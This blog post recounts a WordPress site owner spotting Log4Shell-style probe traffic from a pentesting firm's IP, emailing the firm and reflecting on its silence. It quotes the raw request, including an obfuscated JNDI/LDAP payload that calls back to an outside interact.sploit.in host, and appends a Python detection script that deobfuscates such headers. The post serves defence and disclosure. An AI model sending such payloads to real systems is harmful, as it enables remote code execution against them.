Back in early July some strange traffic was setting off Suricata alerts. The target was my WordPress website. The website is for the benefit of a non-profit and, because of ISP restrictions, is on a custom port. All of the strange traffic came from the same IP, and was registered to a well-known cybersecurity firm. It seemed they were pentesting my system. On July 6th I sent them an email. I tried to be nice.
“Good afternoon. I’ve noticed that for the past several days the IP address IP REDACTED has been sending what looks like suspicious traffic to my WordPress website (IP REDACTED, URL REDACTED). An example of this traffic is as follows:
GET / HTTP/1.1
Host: IP REDACTED
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cache-Control: no-cache
Profile: http://${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#cb1gs2nu2ud0j07k0j3gprtaktowifok4.interact.sploit.in}/wap.xml
X-Vendor: VENDOR REDACTED
Accept-Encoding: gzip
This traffic appears to be related to your company. I was wondering if you had any insight into this.”
I received no reply, but the traffic quickly stopped.
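The Profile header in the request above spells out jndi:ldap:// one character at a time with Log4j-style default-value lookups (${::-j} evaluates to "j"), so a plain string match on "jndi" sees nothing. The following is an added example, not part of the original post: a small normalizer that collapses the string-building lookups (the :- default form, lower and upper, whose semantics are assumed here and evaluated offline) and flags any header whose normalized value carries a JNDI lookup. The sample headers are constructed from the request shown above.

```python
import re

# Constructed sample: the Profile header from the request quoted above plus a
# benign header, so the scanner has both a hit and a miss to work with.
SAMPLE_HEADERS = [
    "Profile: http://${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}"
    "://127.0.0.1#cb1gs2nu2ud0j07k0j3gprtaktowifok4.interact.sploit.in}/wap.xml",
    "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64)",
]

# An innermost lookup: "${...}" whose body holds no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(m):
    """Evaluate one innermost lookup for the string-building forms only
    (assumed Log4j semantics, evaluated offline, no real lookups performed):
    ${::-j} or ${k:-j} -> "j"; ${lower:J} -> "j"; ${upper:j} -> "J".
    Any other lookup (jndi:, env:, sys:, ...) is left in place, visible."""
    body = m.group(1)
    lookup, sep, default = body.partition(":-")
    if sep:                      # default-value form: treat the key as unset
        return default
    prefix, _, arg = lookup.partition(":")
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return m.group(0)

def normalize_lookups(value, max_rounds=50):
    """Collapse nested lookups inside-out until nothing changes (bounded)."""
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_resolve, value)
        if collapsed == value:
            break
        value = collapsed
    return value

def inspect_header(line):
    """Split 'Name: value', normalize the value and flag a JNDI lookup."""
    name, _, value = line.partition(":")
    normalized = normalize_lookups(value.strip())
    return {"header": name.strip(), "normalized": normalized,
            "jndi_lookup": bool(_JNDI.search(normalized))}

def suspicious_headers(lines):
    """Inspection records for the headers that carry a JNDI lookup."""
    return [rec for rec in map(inspect_header, lines) if rec["jndi_lookup"]]
```

The normalized value also exposes the callback host (here the interact.sploit.in name from the request), which is the indicator worth matching in the IDS rather than the raw obfuscated text.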
The vendor is a pretty aggressive cybersecurity firm and their penetration testing service was named in the X-Vendor field. There is no doubt where the traffic was coming from.
My guess is that my IP address accidentally got on their test list. When I alerted them, they corrected the error but declined to reply for legal reasons. I understand their caution. Back in 2019 two physical pentesters were arrested in Iowa. It was a pretty messy situation and put a chill through the industry. Any response may be construed as an admission of guilt. While I was disappointed by the non-response, I understand it.
Years ago an sftp server I managed received repeated, malicious ssh login attempts from an IP registered to my company’s cloud email provider. I told them, they replied “thanks”, and the traffic stopped. That was before 2019.
But this pentest company screwed up. I want to be clear about that. Somebody didn’t do their due diligence and it put the company at risk of legal action, or at least reputational harm. That is unacceptable and should not have happened. But their mistake doesn’t concern me in the least. A principal reason why I host a website (and other services) is to attract traffic to analyze. And this happens in spades. Also, a standard pentest (or vulnerability scan) does not present a threat to my network. In fact, had I not been monitoring traffic, it would have gone completely unnoticed.
I had no intention of filing a complaint, but I would have been very interested in hearing their side of the story. I’ll eventually see them at a trade show. I won’t be bringing it up.